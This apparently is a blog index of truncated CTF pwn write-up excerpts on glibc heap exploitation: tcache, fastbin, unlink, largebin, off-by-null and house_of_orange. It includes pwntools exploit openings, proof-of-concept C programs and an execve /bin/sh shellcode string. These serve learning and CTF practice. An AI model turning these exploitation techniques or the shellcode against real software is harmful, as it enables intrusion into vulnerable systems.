Blog of cat03
byteCTF2020_PWN
Posted on 2021-09-15
easyheap
#!/usr/bin/env python
from pwn import *
binary = "./easyheap"
lib = "/usr/lib/x86_64-linux-gnu/libc-2.31.so"
p = process(binary)
elf = ELF(binary)
libc = ELF(lib)
# context.log_level = "debug"
s = lambda buf: p.send(buf)
sl = lambda buf: p.sendline(buf)
sa = lambda delim, buf: p.sendafter(delim, buf)
sal = lambd ...
tcache attack on mp_ and source analysis
Posted on 2021-09-08
tcache attack on mp_: If a program can only request large chunks, a largebin attack or unsortedbin attack can overwrite a variable with a large value, but it is still hard to allocate a chunk inside libc. The method described here forces large requests to also go through the tcache get/put path, so the usual tcache attack techniques can then be used to allocate libc memory. Tip: the source below is from glibc 2.31.
# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
# define MAYBE_INIT_TCACHE() \
  if (__glibc_unlikely (tcache == NULL)) \
    tcache_init();
static __always_inline void *
tcache_get (size_t tc_idx)
{
  tcache_entry ...
fastbin size misalignment construction and source analysis
Posted on 2021-09-04 | pwn
fastbin size misalignment construction: With tcache, changing the fd pointer to a libc address directly lets you allocate that region, but glibc 2.23 has no tcache. The same region can still be obtained by constructing a misaligned size field inside the libc region.
/* offset 2 to use otherwise unindexable first 2 bins */
#define fastbin_index(sz) \
  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
static void *
_int_malloc (mstate av, size_t bytes)
{
  ...
  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
    {
      idx = f ...
Xiangyun Cup pwn
Posted on 2021-09-02
Note: since there is no free, I attacked it the house_of_orange way.
#!/usr/bin/env python
from pwn import *
re = 1
context.log_level = "debug"
if re:
    p = remote("47.104.70.90", "25315")
    libc = ELF("./libc-2.23.so")
else:
    binary = "./note"
    p = process(binary)
    lib = "/lib ...
off_by_null source analysis
Posted on 2021-08-28 | pwn
One exploitation method on 2.23
#include <stdio.h>
#include <stdlib.h>
typedef unsigned char u8;
typedef unsigned int u32;
int main()
{
    u8 *b1, *b2;
    u8 *A, *B, *C;
    A = malloc(0x18);
    B = malloc(0x100);
    C = malloc(0x100);
    malloc(0); // barrier
    *(u32*)(B+0xf0) = 0x100;
    free(B);
    A[0x18] = '\x00'; // off by null
    b1 = malloc(0x88);
    b2 = malloc(0x18);
    free(b1);
    free(C); // trigger
    return 0;
}
heap layout ...
unlink_attack source analysis
Posted on 2021-08-24 | pwn
unlink attack: this is the unlink attack process
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <assert.h>
uint64_t var1;
int main()
{
    uint64_t *p0 = malloc(0x40);
    uint64_t *p1 = malloc(0x100);
    uint64_t *p2 = malloc(0x90);
    malloc(0x20);
    var1 = (unsigned long)p1;
    p1[0] = 0;
    p1[1] = p1[-1]-0x10;
    p1[2] = (unsigned long)(&var1-3);
    p1[3] = (unsigned long)(&var1-2);
    p2[-2] = p1[-1]-0x10-1;
    p2[-1] = 0xa0; // clear prev_inuse
    fre ...
largebin_attack source analysis
Posted on 2021-08-20 | pwn
Large bin attack source analysis
static void *
_int_malloc (mstate av, size_t bytes)
{
  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
    ... // take from the existing fastbins; if a chunk is found, return it directly
  if (in_smallbin_range (nb))
    ... // take from the existing smallbins; if a chunk is found, return it directly
  else // in_largebin_range
    ...
  for (;; )
    {
      w ...
house_of_orange source analysis
Posted on 2021-08-12
Obtaining a free chunk: the program has no free function, but a free chunk can be obtained as follows. On malloc(size), the call chain is malloc() -> __libc_malloc -> _int_malloc; the logic below is simplified.
static void *
_int_malloc (mstate av, size_t bytes)
{
  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
    ...
  if (in_smallbin_range (nb))
    ...
  else // in_largebin_range
    ...
  // merge via malloc_consolidate; nothing suitable is found in the existing bins
  goto use_top
  ...
use_top:
  victim = av->top;
  size = c ...
Debugging a program with the glibc source
Posted on 2021-08-07
Summary first: method 1 is the most effective, method 2 is suited to debugging other versions, and method 3 is a real test of willpower.
Method 1
Install the libc with debug symbols:
sudo apt install libc6-dbg
sudo apt install libc6-dbg:i386
Download the source: first edit /etc/apt/sources.list and enable the deb-src entries, then update with sudo apt update, then fetch the source with apt source:
apt source libc6-dev
Load it into gdb:
gdb file -d glibc/malloc/ -d glibc/libio/
directory glibc/libio/
Method 2
Check the glibc version:
giles@ubuntu:~/Desktop $ ldd /bin/bash
        linux-vdso.so.1 (0x00007fff9a575000)
        libtinfo.so.6 => /lib/x86_64-linux-gnu/libtinfo.so.6 (0x00007f14d656d000)
        libdl.so.2 => /lib/x86_ ...
Notes from learning IO
Posted on 2021-08-02
hctf2018_the_end
With PIE enabled, a breakpoint in the text segment: b *$rebase(addr)
A breakpoint on a libc address: b *(&_IO_cleanup+137)
one_gadget with several candidates: one_gadget elf --level 1
Follow program flow by way of the stack backtrace.
Manual modification: set {long}&_IO_2_1_stdout_->vtable = arr
Running shellcode:
#include <stdio.h>
int main(void)
{
    unsigned char shellcode[]="\x6a\x68\x48\xb8\x2f\x62\x69\x6e\x2f\x2f\x2f\x73\x50\x48\x89\xe7\x68\x72\x69\x01\x01\x81\x34\x24\x01\x01\x01\x01\x31\xf6\x56\x6a\x08\x5e\x48\x01\xe6\x56\x48\x89\xe6\x31\xd2\x6a\x3b\x58\x0f\x05" ...
©2020 - 2024 By cat03
Framework Hexo | Theme Butterfly